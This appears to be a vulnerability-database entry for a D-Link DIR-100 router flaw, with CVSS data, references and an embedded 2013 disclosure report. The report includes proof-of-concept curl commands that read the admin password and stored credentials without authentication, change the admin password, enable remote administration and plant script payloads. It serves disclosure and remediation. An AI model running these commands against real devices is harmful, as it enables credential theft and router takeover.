Details of VAR-202002-0670

ID

VAR-202002-0670

CVE

CVE-2013-7055

TITLE

D-Link DIR-100 Vulnerable to insufficient protection of credentials

Trust: 0.8

sources: JVNDB: JVNDB-2013-007144

DESCRIPTION

D-Link DIR-100 4.03B07 has PPTP and poe information disclosure. D-Link DIR-100 Contains a vulnerability related to insufficient protection of credentials.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. The D-Link DIR-100 Ethernet Broadband Router fails to properly restrict special access to users, allowing remote attackers to exploit vulnerabilities without having to verify the submission request and obtain information such as PPTP, POE, and Dyndns username and password. D-Link DIR-100 is prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability 2. Multiple information-disclosure vulnerabilities 3. A cross-site request-forgery vulnerability 4. A cross-site scripting vulnerability An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities * Date: 2013-12-18 * Author: Felix Richter * Contact: root@euer.krebsco.de * Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip * Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip * Report Version: 2.0 * Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt * Vulnerable: D-Link DIR-100 * Hardware Revision: D1 * Software Version: 4.03B07 (from 2012-04-10) * CVE Numbers: * CWE-287 Authentication Issues: CVE-2013-7051 * CWE-255 Issues with Credential Management: CVE-2013-7052 * CWE-352 Cross-Site Request Forgery: CVE-2013-7053 * CWE-79 Cross-Site Scripting: CVE-2013-7054 * CWE-200 Information Disclosure: CVE-2013-7055 * Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1 * State: Patched by Vendor * Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8 # Table of Contents 1. Background 2. Technical Description 4. Severity and Remediation 5. Timeline # 1. Background The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications. # 2 Vulnerability Description Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker: - Retrieve the Administrator password without authentication leading to authentication bypass [CWE-255] - Retrieve sensitive configuration paramters like the pppoe username and password without authentication [CWE-200] - Execute privileged Commands without authentication through a race condition leading to weak authentication enforcement [CWE-287] - Sending formatted request to a victim which then will execute arbitrary commands on the device (CSRF) [CWE-352] - Store arbitrary javascript code which will be executed when a victim accesses the administrator interface [CWE-79] CVE-Numbers for these vulnerabilities has not yet been assigned. # 3 Technical Description of the Vulnerabilities ## 3.0 The DIR-100 Web Interface and CGI The DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for unauthenticated users and `/cli.cgi` for authenticated requests. list of features provided by each cgi-script can be retrieved by: curl 'http://192.168.1.104/cliget.cgi?cmd=help' # and respectively when authenticated curl 'http://192.168.1.104/cli.cgi?cmd=help' ## 3.1 Authentication Bypass ### Description The administrator password is not protected in any way on the device, every attacker with access to the administrator interface which listens on port 80. For retrieving the Administrator password the request must not be authenticated. ### Proof of Concept The web interface provides two distinct ways to retrieve the adminstrator password: curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1' curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary' ## 3.2 Weak Authentication ### Description As soon as a user is logged into the administration interface, the cli CGI is `unlocked` and can be used by without authenticating before as the cgi-script does not check any other authentication parameters such as cookies or HTTP Parameters. The only access check is if the IP-Address is the same. ### Proof of Concept # open the router interface in a web browser and log in firefox 'http://192.168.0.1/' # open a new terminal or another web-browser which is currently not logged # in and try to access curl 'http://192.168.0.1/cli.cgi?cmd=help' # this request will be authenticated and it will not be redirected to the # login page. If no user is logged in, the request will be redirected to # the login ## 3.3 Retrieve sensitive information ### Description Besides retrieving the administrator password without authentication it is possible to retrieve other sensitive configuration from the device as well like the PPTP and poe Username and Password, as well as the configured dyndns username and password and configured mail log credentials when these parameters are configured. No authentication is requred. ### Proof of Concept curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1' curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user' curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass' curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user' curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass' curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user' curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd' ## 3.4 Cross-Site Request Forgery (CSRF) ### Description CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. As an example the attacker could change the administrator password (see Proof of Concept code) and enable system remote access. ### Proof of Concept Changing the password for administrator can be done when the ip-address is authenticated: # Log into DIR-100 curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm' # Change password curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit' # enable remote console curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit' ## 3.5 Cross-Site Scripting (XSS) ### Description It is possible for an authenticated user to store information on the server which will not be checked on the server side for special characters which results in persistent Cross-Site Scripting Vulnerabilities. With this vulnerabilty the victim (administrator) will run javascript code in the context of the D-Link DIR-100. XSS is possible because only on the client side (javascript code) the input is filtered and validated, sending data directly to the CGI scripts. ### Proof of Concept # Log into DIR-100 curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm' # XSS in Static IP Address Tab curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=' # XSS in Scheduler tab curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit' # 4 Severity and Remediation This exploits are considered very critical, especially when the feature of remote administration is activated on the system. Weak authentication, together with cross-site request forgery and authentication bypass can result in a full device compromise from an arbitrary website the victim is accessing, even if the device has remote administration deactivated on the internet-port. It is recommended to upgrade the router with the newest firmware of the D-Link DIR-100. # 5 Timeline 2013-09-13 - First Contact with D-Link Support 2013-09-19 - Sent Report 2013-10-14 - Request Status update, Response: Beta will be available mid October 2013-12-02 - Vendor publishes Firmware Update 2013-12-11 - Request CVE-IDs 2013-12-18 - Publish the report

Trust: 2.61

sources: NVD: CVE-2013-7055 // JVNDB: JVNDB-2013-007144 // CNVD: CNVD-2014-01479 // BID: 65290 // VULMON: CVE-2013-7055 // PACKETSTORM: 125041

IOT TAXONOMY

category:

['IoT', 'Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2014-01479

AFFECTED PRODUCTS

vendor:	dlink	model:	dir-100	scope:	eq	version:	4.03b07	Trust: 1.0
vendor:	d link	model:	dir-100	scope:	eq	version:	-	Trust: 0.8
vendor:	d link	model:	dir-100	scope:	eq	version:	dir-100 firmware 4.03b07	Trust: 0.8
vendor:	d link	model:	dir-100 ethernet broadband router 4.03b07	scope:	-	version:	-	Trust: 0.6
vendor:	d link	model:	dir-100 4.03b07	scope:	-	version:	-	Trust: 0.3
vendor:	d link	model:	dir-100 4.03b13	scope:	ne	version:	-	Trust: 0.3

sources: CNVD: CNVD-2014-01479 // BID: 65290 // JVNDB: JVNDB-2013-007144 // NVD: CVE-2013-7055

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2013-7055
value:	CRITICAL
Trust: 1.0
NVD:	CVE-2013-7055
value:	CRITICAL
Trust: 0.8
CNVD:	CNVD-2014-01479
value:	HIGH
Trust: 0.6
CNNVD:	CNNVD-202002-039
value:	CRITICAL
Trust: 0.6
VULMON:	CVE-2013-7055
value:	MEDIUM
Trust: 0.1

nvd@nist.gov:	CVE-2013-7055
severity:	MEDIUM
baseScore:	5.0
vectorString:	AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.9
CNVD:	CNVD-2014-01479
severity:	HIGH
baseScore:	7.8
vectorString:	AV:N/AC:L/AU:N/C:C/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	6.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6

nvd@nist.gov:	CVE-2013-7055
baseSeverity:	CRITICAL
baseScore:	9.8
vectorString:	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	HIGH
exploitabilityScore:	3.9
impactScore:	5.9
version:	3.1
Trust: 1.0
NVD:	CVE-2013-7055
baseSeverity:	CRITICAL
baseScore:	9.8
vectorString:	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	HIGH
exploitabilityScore:	NONE
impactScore:	NONE
version:	3.0
Trust: 0.8

sources: CNVD: CNVD-2014-01479 // VULMON: CVE-2013-7055 // JVNDB: JVNDB-2013-007144 // CNNVD: CNNVD-202002-039 // NVD: CVE-2013-7055

PROBLEMTYPE DATA

problemtype:	CWE-522	Trust: 1.0
problemtype:	Insufficient protection of credentials (CWE-522) [NVD Evaluation ]	Trust: 0.8

sources: JVNDB: JVNDB-2013-007144 // NVD: CVE-2013-7055

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202002-039

TYPE

other

Trust: 0.6

sources: CNNVD: CNNVD-202002-039

EXPLOIT AVAILABILITY

sources: VULMON: CVE-2013-7055

PATCH

title:	Top Page	url:	http://www.dlink.lt/en/	Trust: 0.8
title:	Patch for D-Link DIR-100 Information Disclosure Vulnerability	url:	https://www.cnvd.org.cn/patchInfo/show/44085	Trust: 0.6
title:	D-Link DIR-100 Security vulnerabilities	url:	http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=107311	Trust: 0.6

sources: CNVD: CNVD-2014-01479 // JVNDB: JVNDB-2013-007144 // CNNVD: CNNVD-202002-039

EXTERNAL IDS

db:	NVD	id:	CVE-2013-7055	Trust: 3.5
db:	BID	id:	65290	Trust: 2.6
db:	JVNDB	id:	JVNDB-2013-007144	Trust: 0.8
db:	CNVD	id:	CNVD-2014-01479	Trust: 0.6
db:	NSFOCUS	id:	45769	Trust: 0.6
db:	CNNVD	id:	CNNVD-202002-039	Trust: 0.6
db:	EXPLOIT-DB	id:	31425	Trust: 0.1
db:	VULMON	id:	CVE-2013-7055	Trust: 0.1
db:	PACKETSTORM	id:	125041	Trust: 0.1

sources: CNVD: CNVD-2014-01479 // VULMON: CVE-2013-7055 // BID: 65290 // JVNDB: JVNDB-2013-007144 // PACKETSTORM: 125041 // CNNVD: CNNVD-202002-039 // NVD: CVE-2013-7055

REFERENCES

url:	https://exchange.xforce.ibmcloud.com/vulnerabilities/90903	Trust: 2.5
url:	http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt	Trust: 2.4
url:	https://www.securityfocus.com/bid/65290/info	Trust: 1.7
url:	https://nvd.nist.gov/vuln/detail/cve-2013-7055	Trust: 1.5
url:	http://www.nsfocus.net/vulndb/45769	Trust: 0.6
url:	http://more.dlink.de/sicherheit/news.html#news8	Trust: 0.4
url:	http://www.dlink.com/	Trust: 0.3
url:	http://seclists.org/fulldisclosure/2014/feb/4	Trust: 0.3
url:	https://cwe.mitre.org/data/definitions/522.html	Trust: 0.1
url:	https://nvd.nist.gov	Trust: 0.1
url:	https://www.securityfocus.com/bid/65290	Trust: 0.1
url:	https://www.exploit-db.com/exploits/31425/	Trust: 0.1
url:	http://192.168.1.104/cli.cgi?cmd=help'	Trust: 0.1
url:	http://192.168.0.1/cliget.cgi?cmd=$pptp_user'	Trust: 0.1
url:	http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-7052	Trust: 0.1
url:	http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'	Trust: 0.1
url:	http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'	Trust: 0.1
url:	http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-7051	Trust: 0.1
url:	http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'	Trust: 0.1
url:	http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'	Trust: 0.1
url:	http://192.168.1.104/cliget.cgi?cmd=help'	Trust: 0.1
url:	http://192.168.0.1/cliget.cgi?cmd=$sys_user1'	Trust: 0.1
url:	http://192.168.0.1/login.htm'	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-7053	Trust: 0.1
url:	http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='	Trust: 0.1
url:	http://192.168.0.1/cliget.cgi?cmd=$poe_user'	Trust: 0.1
url:	http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passhash=4%25;commit'	Trust: 0.1
url:	http://192.168.0.1/'	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-7054	Trust: 0.1
url:	http://192.168.0.1/cliget.cgi?cmd=$poe_pass'	Trust: 0.1
url:	http://192.168.0.1/cliget.cgi?cmd=$ddns1'	Trust: 0.1
url:	http://192.168.0.1/cli.cgi?cmd=help'	Trust: 0.1

sources: CNVD: CNVD-2014-01479 // VULMON: CVE-2013-7055 // BID: 65290 // JVNDB: JVNDB-2013-007144 // PACKETSTORM: 125041 // CNNVD: CNNVD-202002-039 // NVD: CVE-2013-7055

CREDITS

Felix Richter

Trust: 1.0

sources: BID: 65290 // PACKETSTORM: 125041 // CNNVD: CNNVD-202002-039

SOURCES

db:	CNVD	id:	CNVD-2014-01479
db:	VULMON	id:	CVE-2013-7055
db:	BID	id:	65290
db:	JVNDB	id:	JVNDB-2013-007144
db:	PACKETSTORM	id:	125041
db:	CNNVD	id:	CNNVD-202002-039
db:	NVD	id:	CVE-2013-7055

LAST UPDATE DATE

2024-11-23T21:36:11.547000+00:00

SOURCES UPDATE DATE

db:	CNVD	id:	CNVD-2014-01479	date:	2014-03-06T00:00:00
db:	VULMON	id:	CVE-2013-7055	date:	2020-02-04T00:00:00
db:	BID	id:	65290	date:	2013-12-03T00:00:00
db:	JVNDB	id:	JVNDB-2013-007144	date:	2020-02-17T00:00:00
db:	CNNVD	id:	CNNVD-202002-039	date:	2020-12-31T00:00:00
db:	NVD	id:	CVE-2013-7055	date:	2024-11-21T02:00:15.093

SOURCES RELEASE DATE

db:	CNVD	id:	CNVD-2014-01479	date:	2014-03-06T00:00:00
db:	VULMON	id:	CVE-2013-7055	date:	2020-02-04T00:00:00
db:	BID	id:	65290	date:	2013-12-03T00:00:00
db:	JVNDB	id:	JVNDB-2013-007144	date:	2020-02-17T00:00:00
db:	PACKETSTORM	id:	125041	date:	2014-02-03T23:36:22
db:	CNNVD	id:	CNNVD-202002-039	date:	2020-02-04T00:00:00
db:	NVD	id:	CVE-2013-7055	date:	2020-02-04T14:15:12.450